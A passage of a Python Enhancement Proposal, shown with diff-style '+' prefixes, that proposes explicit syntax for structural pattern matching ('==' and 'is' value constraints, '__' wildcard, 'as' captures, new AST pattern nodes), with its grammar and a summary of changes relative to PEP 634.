Rather than introducing a completely new symbol, Steven’s proposed resolution to +this verbosity problem was to retain the ability to omit the prefix marker in +syntactically unambiguous cases.

+

While the idea of omitting the prefix marker was accepted for the second +revision of the proposal, it was dropped again in the third revision due to +ambiguity concerns. Instead, the following points apply:

+
    +
  • for class patterns, other syntax changes allow equality constraints to be +written as .ATTR == EXPR, and identity constraints to be written as +.ATTR is EXPR, both of which are quite easy to read
  • +
  • for mapping patterns, the extra syntactic noise is just tolerated (at least +for now)
  • +
  • for OR patterns, the extra syntactic noise is just tolerated (at least +for now). However, membership constraints may offer a future path to +reducing the need to combine OR patterns with equality constraints (instead, +the values to be checked against would be collected as a set, list, or tuple).
  • +
+

Given that perspective, PEP 635’s arguments against using ? as part of the +pattern matching syntax held for this proposal as well, and so the PEP was +amended accordingly.

+
+
+

Using __ as the wildcard pattern marker

+

PEP 635 makes a solid case that introducing ? solely as a wildcard pattern +marker would be a bad idea. With the syntax for value constraints changed +to use existing comparison operations rather than ? and ?is, that +argument holds for this PEP as well.

+

However, as noted by Thomas Wouters in [6], PEP 634’s choice of _ remains +problematic as it would likely mean that match patterns would have a permanent +difference from all other parts of Python - the use of _ in software +internationalisation and at the interactive prompt means that there isn’t really +a plausible path towards using it as a general purpose “skipped binding” marker.

+

__ is an alternative “this value is not needed” marker drawn from a Stack +Overflow answer [7] (originally posted by the author of this PEP) on the +various meanings of _ in existing Python code.

+

This PEP also proposes adopting an implementation technique that limits +the scope of the associated special casing of __ to the parser: defining a +new AST node type (MatchAlways) specifically for wildcard markers, rather +than passing it through to the AST as a Name node.

+

Within the parser, __ still means either a regular name or a wildcard +marker in a match pattern depending on where you were in the parse tree, but +within the rest of the compiler, Name("__") is still a normal variable name, +while MatchAlways() is always a wildcard marker in a match pattern.

+
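A hypothetical sketch of the resulting parse results (MatchAlways is the node proposed by this PEP, not part of current CPython):

+
# "__" used as an ordinary expression still parses as a regular name:
+#     __ + 1          ->  BinOp(left=Name(id='__'), op=Add(), ...)
+# "__" used as a match pattern parses as the dedicated wildcard node:
+#     case __: ...    ->  MatchAlways()
+
+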

Unlike _, the lack of other use cases for __ means that there would be +a plausible path towards restoring identifier handling consistency with the rest +of the language by making __ mean “skip this name binding” everywhere in +Python:

+
    +
  • in the interpreter itself, deprecate loading variables with the name __. +This would make reading from __ emit a deprecation warning, while writing +to it would initially be unchanged. To avoid slowing down all name loads, this +could be handled by having the compiler emit additional code for the +deprecated name, rather than using a runtime check in the standard name +loading opcodes.
  • +
  • after a suitable number of releases, change the parser to emit +a new SkippedBinding AST node for all uses of __ as an assignment +target, and update the rest of the compiler accordingly
  • +
  • consider making __ a true hard keyword rather than a soft keyword
  • +
+

This deprecation path couldn’t be followed for _, as there’s no way for the +interpreter to distinguish between attempts to read back _ when nominally +used as a “don’t care” marker, and legitimate reads of _ as either an +i18n text translation function or as the last statement result at the +interactive prompt.

+

Names starting with double-underscores are also already reserved for use by the +language, whether that is for compile time constants (i.e. __debug__), +special methods, or class attribute name mangling, so using __ here would +be consistent with that existing approach.

+
+
+

Representing patterns explicitly in the Abstract Syntax Tree

+

PEP 634 doesn’t explicitly discuss how match statements should be represented +in the Abstract Syntax Tree, instead leaving that detail to be defined as part +of the implementation.

+

As a result, while the reference implementation of PEP 634 definitely works (and +formed the basis of the reference implementation of this PEP), it does contain +a significant design flaw: despite the notes in PEP 635 that patterns should be +considered as distinct from expressions, the reference implementation goes ahead +and represents them in the AST as expression nodes.

+

The result is an AST that isn’t very abstract at all: nodes that should be +compiled completely differently (because they’re patterns rather than +expressions) are represented the same way, and the type system of the +implementation language (e.g. C for CPython) can’t offer any assistance in +keeping track of which subnodes should be ordinary expressions and which should +be subpatterns.

+

Rather than continuing with that approach, this PEP has instead defined a new +explicit “pattern” node in the AST, which allows the patterns and their +permitted subnodes to be defined explicitly in the AST itself, making the code +implementing the new feature clearer, and allowing the C compiler to provide +more assistance in keeping track of when the code generator is dealing with +patterns or expressions.

+

This change in implementation approach is actually orthogonal to the surface +syntax changes proposed in this PEP, so it could still be adopted even if the +rest of the PEP were to be rejected.

+
+
+

Changes to sequence patterns

+

This PEP makes one notable change to sequence patterns relative to PEP 634:

+
    +
  • only the square bracket form of sequence pattern is supported. Neither open +(no delimiters) nor tuple style (parentheses as delimiters) sequence patterns +are supported.
  • +
+

Relative to PEP 634, sequence patterns are also significantly affected by the +change to require explicit qualification of capture patterns and value +constraints, as it means case [a, b, c]: must instead be written as +case [as a, as b, as c]: and case [0, 1]: must instead be written as +case [== 0, == 1]:.

+

With the syntax for sequence patterns no longer being derived directly from the +syntax for iterable unpacking, it no longer made sense to keep the syntactic +flexibility that had been included in the original syntax proposal purely for +consistency with iterable unpacking.

+

Allowing open and tuple style sequence patterns didn’t increase expressivity, +only ambiguity of intent (especially relative to group patterns), and encouraged +readers down the path of viewing pattern matching syntax as intrinsically linked +to assignment target syntax (which the PEP 634 authors have stated multiple +times is not a desirable path to have readers take, and a view the author of +this PEP now shares, despite disagreeing with it originally).

+
+
+

Changes to mapping patterns

+

This PEP makes two notable changes to mapping patterns relative to PEP 634:

+
    +
  • value capturing is written as KEY as NAME rather than as KEY: NAME
  • +
  • a wider range of keys are permitted: any “closed expression”, rather than +only literals and attribute references
  • +
+

As discussed above, the first change is part of ensuring that all binding +operations with the target name to the right of a subexpression or pattern +use the as keyword.

+

The second change is mostly a matter of simplifying the parser and code +generator code by reusing the existing expression handling machinery. The +restriction to closed expressions is designed to help reduce ambiguity as to +where the key expression ends and the match pattern begins. This mostly allows +a superset of what PEP 634 allows, except that complex literals must be written +in parentheses (at least for now).

+

Adapting PEP 635’s mapping pattern examples to the syntax proposed in this PEP:

+
match json_pet:
+    case {"type": == "cat", "name" as name, "pattern" as pattern}:
+        return Cat(name, pattern)
+    case {"type": == "dog", "name" as name, "breed" as breed}:
+        return Dog(name, breed)
+    case __:
+        raise ValueError("Not a suitable pet")
+
+def change_red_to_blue(json_obj):
+    match json_obj:
+        case { 'color': (== 'red' | == '#FF0000') }:
+            json_obj['color'] = 'blue'
+        case { 'children' as children }:
+            for child in children:
+                change_red_to_blue(child)
+
+
+

For reference, the equivalent PEP 634 syntax:

+
match json_pet:
+    case {"type": "cat", "name": name, "pattern": pattern}:
+        return Cat(name, pattern)
+    case {"type": "dog", "name": name, "breed": breed}:
+        return Dog(name, breed)
+    case _:
+        raise ValueError("Not a suitable pet")
+
+def change_red_to_blue(json_obj):
+    match json_obj:
+        case { 'color': ('red' | '#FF0000') }:
+            json_obj['color'] = 'blue'
+        case { 'children': children }:
+            for child in children:
+                change_red_to_blue(child)
+
+
+
+
+

Changes to class patterns

+

This PEP makes several notable changes to class patterns relative to PEP 634:

+
    +
  • the syntactic alignment with class instantiation is abandoned as being +actively misleading and unhelpful. Instead, a new dedicated syntax for +checking additional attributes is introduced that draws inspiration from +mapping patterns rather than class instantiation
  • +
  • a new dedicated syntax for simple ducktyping that will work for any class +is introduced
  • +
  • the special casing of various builtin and standard library types is +supplemented by a general check for the existence of a __match_args__ +attribute with the value of None
  • +
+

As discussed above, the first change has two purposes:

+
    +
  • it’s part of ensuring that all binding operations with the target name to the +right of a subexpression or pattern use the as keyword. Using = to +assign to the right is particularly problematic.
  • +
  • it’s part of ensuring that all uses of simple names in patterns have a prefix +that indicates their purpose (in this case, a leading . to indicate an +attribute lookup)
  • +
+

The syntactic alignment with class instantiation was also judged to be unhelpful in general, as class patterns are about matching patterns against attributes, while class instantiation is about matching call arguments to parameters in class constructors, which may not bear much resemblance to the resulting instance attributes at all.

+

The second change is intended to make it easier to use pattern matching for the +“ducktyping” style checks that are already common in Python.

+

The concrete syntax proposal for these patterns then arose from viewing instances as mappings of attribute names to values, and combining the attribute lookup syntax (.ATTR) with the mapping pattern syntax {KEY: PATTERN} to give cls{.ATTR: PATTERN}.

+

Allowing cls{.ATTR} to mean the same thing as cls{.ATTR: __} was a matter of considering the leading . sufficient to render the name usage unambiguous (it’s clearly an attribute reference, whereas matching against a variable key in a mapping pattern would be arguably ambiguous).

+
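Illustratively, the following two patterns would therefore be equivalent under this PEP:

+
# A bare attribute name implies a wildcard subpattern:
+case object{.host}:
+# ...is equivalent to:
+case object{.host: __}:
+
+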

The final change just supplements a CPython-internal-only check in the PEP 634 +reference implementation by making it the default behaviour that classes get if +they don’t define __match_args__ (the optimised fast path for the builtin +and standard library types named in PEP 634 is retained).

+

Adapting the class matching example +linked from PEP 635 +shows that for purely positional class matching, the main impact comes from the +changes to value constraints and name binding, not from the class matching +changes:

+
match expr:
+    case BinaryOp(== '+', as left, as right):
+        return eval_expr(left) + eval_expr(right)
+    case BinaryOp(== '-', as left, as right):
+        return eval_expr(left) - eval_expr(right)
+    case BinaryOp(== '*', as left, as right):
+        return eval_expr(left) * eval_expr(right)
+    case BinaryOp(== '/', as left, as right):
+        return eval_expr(left) / eval_expr(right)
+    case UnaryOp(== '+', as arg):
+        return eval_expr(arg)
+    case UnaryOp(== '-', as arg):
+        return -eval_expr(arg)
+    case VarExpr(as name):
+        raise ValueError(f"Unknown value of: {name}")
+    case float() | int():
+        return expr
+    case __:
+        raise ValueError(f"Invalid expression value: {repr(expr)}")
+
+
+

For reference, the equivalent PEP 634 syntax:

+
match expr:
+    case BinaryOp('+', left, right):
+        return eval_expr(left) + eval_expr(right)
+    case BinaryOp('-', left, right):
+        return eval_expr(left) - eval_expr(right)
+    case BinaryOp('*', left, right):
+        return eval_expr(left) * eval_expr(right)
+    case BinaryOp('/', left, right):
+        return eval_expr(left) / eval_expr(right)
+    case UnaryOp('+', arg):
+        return eval_expr(arg)
+    case UnaryOp('-', arg):
+        return -eval_expr(arg)
+    case VarExpr(name):
+        raise ValueError(f"Unknown value of: {name}")
+    case float() | int():
+        return expr
+    case _:
+        raise ValueError(f"Invalid expression value: {repr(expr)}")
+
+
+

The changes to the class pattern syntax itself are more relevant when +checking for named attributes and extracting their values without relying on +__match_args__:

+
match expr:
+    case object{.host as host, .port as port}:
+        pass
+    case object{.host as host}:
+        pass
+
+
+

Compare this to the PEP 634 equivalent, where it really isn’t clear which names +are referring to attributes of the match subject and which names are referring +to local variables:

+
match expr:
+    case object(host=host, port=port):
+        pass
+    case object(host=host):
+        pass
+
+
+

In this specific case, that ambiguity doesn’t matter (since the attribute and +variable names are the same), but in the general case, knowing which is which +will be critical to reasoning correctly about the code being read.

+
+
+
+

Deferred Ideas

+
+

Inferred value constraints

+

As discussed above, this PEP doesn’t rule out the possibility of adding +inferred equality and identity constraints in the future.

+

These could be particularly valuable for literals, as it is quite likely that many “magic” strings and numbers with self-evident meanings will be written directly into match patterns, rather than being stored in named variables. (Think constants like None, or obviously special numbers like 0 and 1, or strings where their contents are as descriptive as any variable name, rather than cryptic checks against opaque numbers like 739452.)

+
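If such inference were ever added, prefixes could be dropped in cases like the following (a purely hypothetical sketch, not part of this proposal):

+
# Explicit syntax in this PEP (left), with a possible future inferred form (right):
+case == 0 | == 1:        # might become:  case 0 | 1:
+case is None:            # might become:  case None:
+case == "simple":        # might become:  case "simple":
+
+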
+
+

Making some required parentheses optional

+

The PEP currently errs heavily on the side of requiring parentheses in the face +of potential ambiguity.

+

However, there are a number of cases where it at least arguably goes too far, +mostly involving AS patterns with an explicit pattern.

+

In any position that requires a closed pattern, AS patterns may end up starting +with doubled parentheses, as the nested pattern is also required to be a closed +pattern: ((OPEN PTRN) as NAME)

+

Due to the requirement that the subpattern be closed, it should be reasonable +in many of these cases (e.g. sequence pattern subpatterns) to accept +CLOSED_PTRN as NAME directly.

+

Further consideration of this point has been deferred, as making required +parentheses optional is a backwards compatible change, and hence relaxing the +restrictions later can be considered on a case-by-case basis.

+
+
+

Accepting complex literals as closed expressions

+

PEP 634’s reference implementation includes a lot of special casing of binary +operations in both the parser and the rest of the compiler in order to accept +complex literals without accepting arbitrary binary numeric operations on +literal values.

+

Ideally, this problem would be dealt with at the parser layer, with the parser +directly emitting a Constant AST node prepopulated with a complex number. If +that was the way things worked, then complex literals could be accepted through +a similar mechanism to any other literal.

+

This isn’t how complex literals are handled, however. Instead, they’re passed +through to the AST as regular BinOp nodes, and then the constant folding +pass on the AST resolves them down to Constant nodes with a complex value.

+
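This behaviour is directly observable with the ast module in current Python (exact output details may vary slightly by version):

+
import ast
+
+# The parser emits a regular BinOp node for a complex literal...
+print(ast.dump(ast.parse("1 + 2j", mode="eval").body))
+# BinOp(left=Constant(value=1), op=Add(), right=Constant(value=2j))
+
+# ...and only the AST constant folding pass reduces it to a single constant:
+print(compile("1 + 2j", "<demo>", "eval").co_consts)
+# ((1+2j),)
+
+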

For the parser to resolve complex literals directly, the compiler would need to +be able to tell the tokenizer to generate a distinct token type for +imaginary numbers (e.g. INUMBER), which would then allow the parser to +handle NUMBER + INUMBER and NUMBER - INUMBER separately from other +binary operations.

+

Alternatively, a new ComplexNumber AST node type could be defined, which +would allow the parser to notify the subsequent compiler stages that a +particular node should specifically be a complex literal, rather than an +arbitrary binary operation. Then the parser could accept NUMBER + NUMBER +and NUMBER - NUMBER for that node, while letting the AST validation for +ComplexNumber take care of ensuring that the real and imaginary parts of +the literal were real and imaginary numbers as expected.

+

For now, this PEP has postponed dealing with this question, and instead just +requires that complex literals be parenthesised in order to be used in value +constraints and as mapping pattern keys.

+
+
+

Allowing negated constraints in match patterns

+

With the syntax proposed in this PEP, it isn’t permitted to write != expr +or is not expr as a match pattern.

+

Both of these forms have clear potential interpretations as a negated equality +constraint (i.e. x != expr) and a negated identity constraint +(i.e. x is not expr).

+

However, it’s far from clear either form would come up often enough to justify +the dedicated syntax, so the possible extension has been deferred pending further +community experience with match statements.

+
+
+

Allowing membership checks in match patterns

+

The syntax used for equality and identity constraints would be straightforward +to extend to membership checks: in container.

+

One downside of the proposals in both this PEP and PEP 634 is that checking +for multiple values in the same case doesn’t look like any existing container +membership check in Python:

+
# PEP 634's literal patterns
+match value:
+    case 0 | 1 | 2 | 3:
+        ...
+
+# This PEP's equality constraints
+match value:
+    case == 0 | == 1 | == 2 | == 3:
+        ...
+
+
+

Allowing inferred equality constraints under this PEP would only make it look like the PEP 634 example; it still wouldn’t look like the equivalent if statement header (if value in {0, 1, 2, 3}:).

+

Membership constraints would provide a more explicit, but still concise, way +to check if the match subject was present in a container, and it would look +the same as an ordinary containment check:

+
match value:
+    case in {0, 1, 2, 3}:
+        ...
+    case in {one, two, three, four}:
+        ...
+    case in range(4): # It would accept any container, not just literal sets
+        ...
+
+
+

Such a feature would also be readily extensible to allow all kinds of case +clauses without any further syntax updates, simply by defining __contains__ +appropriately on a custom class definition.

+

However, while this does seem like a useful extension, and a good way to resolve +this PEP’s verbosity problem when combining multiple equality checks in an +OR pattern, it isn’t essential to making match statements a valuable addition +to the language, so it seems more appropriate to defer it to a separate proposal, +rather than including it here.

+
+
+

Inferring a default type for instance attribute constraints

+

The dedicated syntax for instance attribute constraints means that object +could be omitted from object{.ATTR} to give {.ATTR} without introducing +any syntactic ambiguity (if no class was given, object would be implied, +just as it is for the base class list in class definitions).

+

However, it’s far from clear saving six characters is worth making it harder to +visually distinguish mapping patterns from instance attribute patterns, so +allowing this has been deferred as a topic for possible future consideration.

+
+
+

Avoiding special cases in sequence patterns

+

Sequence patterns in both this PEP and PEP 634 currently special case str, +bytes, and bytearray as specifically never matching a sequence +pattern.

+

This special casing could potentially be removed if we were to define a new +collections.abc.AtomicSequence abstract base class for types like these, +where they’re conceptually a single item, but still implement the sequence +protocol to allow random access to their component parts.

+
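This behaviour is observable in released Python versions implementing PEP 634 (3.10 and later):

+
# Strings implement the sequence protocol, yet never match sequence patterns:
+match "ab":
+    case [x, y]:
+        print("matched as a sequence")       # never reached
+    case _:                                  # PEP 634's wildcard spelling
+        print("treated as an atomic value")  # this branch runs
+
+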
+
+

Expression syntax to retrieve multiple attributes from an instance

+

The instance attribute pattern syntax has been designed such that it could +be used as the basis for a general purpose syntax for retrieving multiple +attributes from an object in a single expression:

+
host, port = obj{.host, .port}
+
+
+

Similar to slice syntax only being allowed inside bracket subscripts, the .attr syntax for naming attributes would only be allowed inside brace subscripts.

+

This idea isn’t required for pattern matching to be useful, so it isn’t part of +this PEP. However, it’s mentioned as a possible path towards making pattern +matching feel more integrated into the rest of the language, rather than +existing forever in its own completely separated world.

+
+
+

Expression syntax to retrieve multiple items from a container

+

If the brace subscript syntax were to be accepted for instance attribute +pattern matching, and then subsequently extended to offer general purpose +extraction of multiple attributes, then it could be extended even further to +allow for retrieval of multiple items from containers based on the syntax +used for mapping pattern matching:

+
host, port = obj{"host", "port"}
+first, last = obj{0, -1}
+
+
+

Again, this idea isn’t required for pattern matching to be useful, so it isn’t +part of this PEP. As with retrieving multiple attributes, however, it is +included as an example of the proposed pattern matching syntax inspiring ideas +for making object deconstruction easier in general.

+
+
+
+

Rejected Ideas

+
+

Restricting permitted expressions in value constraints and mapping pattern keys

+

While it’s entirely technically possible to restrict the kinds of expressions +permitted in value constraints and mapping pattern keys to just attribute +lookups and constant literals (as PEP 634 does), there isn’t any clear runtime +value in doing so, so this PEP proposes allowing any kind of primary expression +(primary expressions are an existing node type in the grammar that includes +things like literals, names, attribute lookups, function calls, container +subscripts, parenthesised groups, etc), as well as high precedence unary +operations (+, -, ~) on primary expressions.

+

While PEP 635 does emphasise several times that literal patterns and value +patterns are not full expressions, it doesn’t ever articulate a concrete benefit +that is obtained from that restriction (just a theoretical appeal to it being +useful to separate static checks from dynamic checks, which a code style +tool could still enforce, even if the compiler itself is more permissive).

+

The last time we imposed such a restriction was for decorator expressions and +the primary outcome of that was that users had to put up with years of awkward +syntactic workarounds (like nesting arbitrary expressions inside function calls +that just returned their argument) to express the behaviour they wanted before +the language definition was finally updated to allow arbitrary expressions and +let users make their own decisions about readability.

+

The situation in PEP 634 that bears a resemblance to the situation with decorator +expressions is that arbitrary expressions are technically supported in value +patterns, they just require awkward workarounds where either all the values to +match need to be specified in a helper class that is placed before the match +statement:

+
# Allowing arbitrary match targets with PEP 634's value pattern syntax
+class mt:
+    value = func()
+match expr:
+    case (_, mt.value):
+        ... # Handle the case where 'expr[1] == func()'
+
+
+

Or else they need to be written as a combination of a capture pattern and a +guard expression:

+
# Allowing arbitrary match targets with PEP 634's guard expressions
+match expr:
+    case (_, _matched) if _matched == func():
+        ... # Handle the case where 'expr[1] == func()'
+
+
+

This PEP proposes skipping requiring any such workarounds, and instead +supporting arbitrary value constraints from the start:

+
match expr:
+    case [__, == func()]:
+        ... # Handle the case where 'expr[1] == func()'
+
+
+

Whether actually writing that kind of code is a good idea would be a topic for +style guides and code linters, not the language compiler.

+

In particular, if static analysers can’t follow certain kinds of dynamic checks, +then they can limit the permitted expressions at analysis time, rather than the +compiler restricting them at compile time.

+

There are also some kinds of expressions that are almost certain to give +nonsensical results (e.g. yield, yield from, await) due to the +pattern caching rule, where the number of times the constraint expression +actually gets evaluated will be implementation dependent. Even here, the PEP +takes the view of letting users write nonsense if they really want to.

+

Aside from the recently updated decorator expressions, another situation where +Python’s formal syntax offers full freedom of expression that is almost never +used in practice is in except clauses: the exceptions to match against +almost always take the form of a simple name, a dotted name, or a tuple of +those, but the language grammar permits arbitrary expressions at that point. +This is a good indication that Python’s user base can be trusted to +take responsibility for finding readable ways to use permissive language +features, by avoiding writing hard to read constructs even when they’re +permitted by the compiler.

+
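For example, the following is already legal (if unidiomatic) Python today:

+
strict = True
+try:
+    int("not a number")
+except (ValueError if strict else TypeError):
+    # The grammar permits an arbitrary expression after "except",
+    # even though simple and dotted names dominate in practice.
+    pass
+
+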

This permissiveness comes with a real concrete benefit on the implementation side: dozens of lines of match statement specific code in the compiler are replaced by simple calls to the existing code for compiling expressions (including in the AST validation pass, the AST optimization pass, the symbol table analysis pass, and the code generation pass). This implementation benefit would accrue not just to CPython, but to every other Python implementation looking to add match statement support.

+
+
+

Requiring the use of constraint prefix markers for mapping pattern keys

+

The initial (unpublished) draft of this proposal suggested requiring mapping +pattern keys be value constraints, just as PEP 634 requires that they be valid +literal or value patterns:

+
import constants
+
+match config:
+    case {== "route": route}:
+        process_route(route)
+    case {== constants.DEFAULT_PORT: sub_config, **rest}:
+        process_config(sub_config, rest)
+
+
+

However, the extra characters were syntactically noisy and unlike its use in +value constraints (where it distinguishes them from non-pattern expressions), +the prefix doesn’t provide any additional information here that isn’t already +conveyed by the expression’s position as a key within a mapping pattern.

+

Accordingly, the proposal was simplified to omit the marker prefix from mapping +pattern keys.

+

This omission also aligns with the fact that containers may incorporate both +identity and equality checks into their lookup process - they don’t purely +rely on equality checks, as would be incorrectly implied by the use of the +equality constraint prefix.

+
+
+

Allowing the key/value separator to be omitted for mapping value constraints

+

Instance attribute patterns allow the : separator to be omitted when +writing attribute value constraints like case object{.attr == expr}.

+

Offering a similar shorthand for mapping value constraints was considered, but +permitting it allows thoroughly baffling constructs like case {0 == 0}: +where the compiler knows this is the key 0 with the value constraint +== 0, but a human reader sees the tautological comparison operation +0 == 0. With the key/value separator included, the intent is more obvious to +a human reader as well: case {0: == 0}:

+
+
+
+

Reference Implementation

+

A draft reference implementation for this PEP [3] has been derived from Brandt +Bucher’s reference implementation for PEP 634 [4].

+

Relative to the text of this PEP, the draft reference implementation has not +yet complemented the special casing of several builtin and standard library +types in MATCH_CLASS with the more general check for __match_args__ +being set to None. Class defined patterns also currently still accept +classes that don’t define __match_args__.

+

All other modified patterns have been updated to follow this PEP rather than +PEP 634.

+

Unparsing for match patterns has not yet been migrated to the updated v3 AST.

+

The AST validator for match patterns has not yet been implemented.

+

The AST validator in general has not yet been reviewed to ensure that it is +checking that only expression nodes are being passed in where expression nodes +are expected.

+

The examples in this PEP have not yet been converted to test cases, so could +plausibly contain typos and other errors.

+

Several of the old PEP 634 tests are still to be converted to new SyntaxError +tests.

+

The documentation has not yet been updated.

+
+
+

Acknowledgments

+

The PEP 622 and PEP 634/PEP 635/PEP 636 authors, as the proposal in +this PEP is merely +an attempt to improve the readability of an already well-constructed idea by +proposing that starting with a more explicit syntax and potentially introducing +syntactic shortcuts for particularly common operations later is a better option +than attempting to only define the shortcut version. For areas of the +specification where the two PEPs are the same (or at least very similar), the +text describing the intended behaviour in this PEP is often derived directly +from the PEP 634 text.

+

Steven D’Aprano, who made a compelling case that the key goals of this PEP could be achieved by using existing comparison tokens to provide the ability to override the compiler when our guesses as to “what most users will want most of the time” are inevitably incorrect for at least some users some of the time, and by retaining some of PEP 634’s syntactic sugar (with a slightly different semantic definition) to obtain the same level of brevity as PEP 634 in most situations. (Paul Sokolovsky also independently suggested using == instead of ? as a more easily understood prefix for equality constraints).

+

Thomas Wouters, whose publication of PEP 640 and public review of the structured +pattern matching proposals persuaded the author of this PEP to continue +advocating for a wildcard pattern syntax that a future PEP could plausibly turn +into a hard keyword that always skips binding a reference in any location a +simple name is expected, rather than continuing indefinitely as the match +pattern specific soft keyword that is proposed here.

+

Joao Bueno and Jim Jewett for nudging the PEP author to take a closer look at +the proposed syntax for subelement capturing within class patterns and mapping +patterns (particularly the problems with “capturing to the right”). This +review is what prompted the significant changes between v2 and v3 of the +proposal.

+
+
+

References

+ +
+
+

Appendix A – Full Grammar

+

Here is the full modified grammar for match_stmt, replacing Appendix A +in PEP 634.

+

Notation used beyond standard EBNF is as per PEP 617:

+
    +
  • 'KWD' denotes a hard keyword
  • +
  • "KWD" denotes a soft keyword
  • +
  • SEP.RULE+ is shorthand for RULE (SEP RULE)*
  • +
  • !RULE is a negative lookahead assertion
  • +
+
match_stmt: "match" subject_expr ':' NEWLINE INDENT case_block+ DEDENT
+subject_expr:
+    | star_named_expression ',' [star_named_expressions]
+    | named_expression
+case_block: "case" (guarded_pattern | open_pattern) ':' block
+
+guarded_pattern: closed_pattern 'if' named_expression
+open_pattern: # Pattern may use multiple tokens with no closing delimiter
+    | as_pattern
+    | or_pattern
+
+as_pattern: [closed_pattern] pattern_as_clause
+as_pattern_with_inferred_wildcard: pattern_as_clause
+pattern_as_clause: 'as' pattern_capture_target
+pattern_capture_target: !"__" NAME !('.' | '(' | '=')
+
+or_pattern: '|'.simple_pattern+
+
+simple_pattern: # Subnode where "as" and "or" patterns must be parenthesised
+    | closed_pattern
+    | value_constraint
+
+value_constraint:
+    | eq_constraint
+    | id_constraint
+
+eq_constraint: '==' closed_expr
+id_constraint: 'is' closed_expr
+
+closed_expr: # Require a single token or a closing delimiter in expression
+    | primary
+    | closed_factor
+
+closed_factor: # "factor" is the main grammar node for these unary ops
+    | '+' primary
+    | '-' primary
+    | '~' primary
+
+closed_pattern: # Require a single token or a closing delimiter in pattern
+    | wildcard_pattern
+    | group_pattern
+    | structural_constraint
+
+wildcard_pattern: "__"
+
+group_pattern: '(' open_pattern ')'
+
+structural_constraint:
+    | sequence_constraint
+    | mapping_constraint
+    | attrs_constraint
+    | class_constraint
+
+sequence_constraint: '[' [sequence_constraint_elements] ']'
+sequence_constraint_elements: ','.sequence_constraint_element+ ','?
+sequence_constraint_element:
+    | star_pattern
+    | simple_pattern
+    | as_pattern_with_inferred_wildcard
+star_pattern: '*' (pattern_as_clause | wildcard_pattern)
+
+mapping_constraint: '{' [mapping_constraint_elements] '}'
+mapping_constraint_elements: ','.key_value_constraint+ ','?
+key_value_constraint:
+    | closed_expr pattern_as_clause
+    | closed_expr ':' simple_pattern
+    | double_star_capture
+double_star_capture: '**' pattern_as_clause
+
+attrs_constraint:
+    | name_or_attr '{' [attrs_constraint_elements] '}'
+name_or_attr: attr | NAME
+attr: name_or_attr '.' NAME
+attrs_constraint_elements: ','.attr_value_constraint+ ','?
+attr_value_constraint:
+    | '.' NAME pattern_as_clause
+    | '.' NAME value_constraint
+    | '.' NAME ':' simple_pattern
+    | '.' NAME
+
+class_constraint:
+    | name_or_attr '(' ')'
+    | name_or_attr '(' positional_patterns ','? ')'
+    | name_or_attr '(' class_constraint_attrs ')'
+    | name_or_attr '(' positional_patterns ',' class_constraint_attrs ')'
+positional_patterns: ','.positional_pattern+
+positional_pattern:
+    | simple_pattern
+    | as_pattern_with_inferred_wildcard
+class_constraint_attrs:
+    | '**' '{' [attrs_constraint_elements] '}'
+
+
+
+
+

Appendix B: Summary of Abstract Syntax Tree changes

+

The following new nodes are added to the AST by this PEP:

+
stmt = ...
+      | ...
+      | Match(expr subject, match_case* cases)
+      | ...
+      ...
+
+match_case = (pattern pattern, expr? guard, stmt* body)
+
+pattern = MatchAlways
+     | MatchValue(matchop op, expr value)
+     | MatchSequence(pattern* patterns)
+     | MatchMapping(expr* keys, pattern* patterns)
+     | MatchAttrs(expr cls, identifier* attrs, pattern* patterns)
+     | MatchClass(expr cls, pattern* patterns, identifier* extra_attrs, pattern* extra_patterns)
+
+     | MatchRestOfSequence(identifier? target)
+     -- A NULL entry in the MatchMapping key list handles capturing extra mapping keys
+
+     | MatchAs(pattern? pattern, identifier target)
+     | MatchOr(pattern* patterns)
+
+      attributes (int lineno, int col_offset, int? end_lineno, int? end_col_offset)
+
+matchop = EqCheck | IdCheck
+
+
+
+
+

Appendix C: Summary of changes relative to PEP 634

+

The overall match/case statement syntax and the guard expression syntax +remain the same as they are in PEP 634.

+

Relative to PEP 634 this PEP makes the following key changes:

+
    +
  • a new pattern type is defined in the AST, rather than reusing the expr +type for patterns
  • +
  • the new MatchAs and MatchOr AST nodes are moved from the expr +type to the pattern type
  • +
  • the wildcard pattern changes from _ (single underscore) to __ (double +underscore), and gains a dedicated MatchAlways node in the AST
  • +
  • due to ambiguity of intent, value patterns and literal patterns are removed
  • +
  • a new expression category is introduced: “closed expressions”
  • +
  • closed expressions are either primary expressions, or a closed expression +preceded by one of the high precedence unary operators (+, -, ~)
  • +
  • a new pattern type is introduced: “value constraint patterns”
  • +
  • value constraints have a dedicated MatchValue AST node rather than +allowing a combination of Constant (literals), UnaryOp +(negative numbers), BinOp (complex numbers), and Attribute (attribute +lookups)
  • +
  • value constraint patterns are either equality constraints or identity constraints
  • +
  • equality constraints use == as a prefix marker on an otherwise +arbitrary closed expression: == EXPR
  • +
  • identity constraints use is as a prefix marker on an otherwise +arbitrary closed expression: is EXPR
  • +
  • due to ambiguity of intent, capture patterns are removed. All capture operations +use the as keyword (even in sequence matching) and are represented in the +AST as either MatchAs or MatchRestOfSequence nodes.
  • +
  • to reduce verbosity in AS patterns, as NAME is permitted, with the same +meaning as __ as NAME
  • +
  • sequence patterns change to require the use of square brackets, rather than +offering the same syntactic flexibility as assignment targets (assignment +statements allow iterable unpacking to be indicated by any use of a tuple +separated target, with or without surrounding parentheses or square brackets)
  • +
  • sequence patterns gain a dedicated MatchSequence AST node rather than +reusing List
  • +
  • mapping patterns change to allow arbitrary closed expressions as keys
  • +
  • mapping patterns gain a dedicated MatchMapping AST node rather than +reusing Dict
  • +
  • to reduce verbosity in mapping patterns, KEY : __ as NAME may be shortened +to KEY as NAME
  • +
  • class patterns no longer use individual keyword argument syntax for attribute +matching. Instead they use double-star syntax, along with a variant on mapping +pattern syntax with a dot prefix on the attribute names
  • +
  • class patterns gain a dedicated MatchClass AST node rather than +reusing Call
  • +
  • to reduce verbosity, class attribute matching allows : to be omitted when +the pattern to be matched starts with ==, is, or as
  • +
  • class patterns treat any class that sets __match_args__ to None as +accepting a single positional pattern that is matched against the entire +object (avoiding the special casing required in PEP 634)
  • +
  • class patterns raise TypeError when used with an object that does not +define __match_args__
  • +
  • dedicated syntax for ducktyping is added, such that case cls{...}: is +roughly equivalent to case cls(**{...}):, but skips the check for the +existence of __match_args__. This pattern also has a dedicated AST node, +MatchAttrs
  • +
+

Note that postponing literal patterns also makes it possible to postpone the +question of whether we need an “INUMBER” token in the tokeniser for imaginary +literals. Without it, the parser can’t distinguish complex literals from other +binary addition and subtraction operations on constants, so proposals like +PEP 634 have to do work in later compilation steps to check for correct usage.

+
+
+

Appendix D: History of changes to this proposal

+

